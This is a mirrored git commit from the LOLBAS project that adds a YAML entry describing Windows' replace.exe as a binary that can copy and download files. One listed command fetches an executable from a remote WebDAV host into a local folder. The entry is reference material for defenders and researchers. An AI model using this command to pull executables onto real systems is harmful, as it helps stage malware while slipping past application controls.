mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
MD files generate from Script, and adjustments to readme
This commit is contained in:
21
yml/OSBinaries/Replace.yml
Normal file
21
yml/OSBinaries/Replace.yml
Normal file
@@ -0,0 +1,21 @@
|
||||
---
|
||||
Name: Replace.exe
|
||||
Description: Copy, Download
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||
Description: Copy the specified file to the destination folder.
|
||||
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||
Description: Copy the specified file to the destination folder.
|
||||
Full Path:
|
||||
- C:\Windows\System32\replace.exe
|
||||
- C:\Windows\SysWOW64\replace.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/elceef/status/986334113941655553
|
||||
- https://twitter.com/elceef/status/986842299861782529
|
||||
Notes: Thanks to elceef - @elceef
|
||||
|
Reference in New Issue
Block a user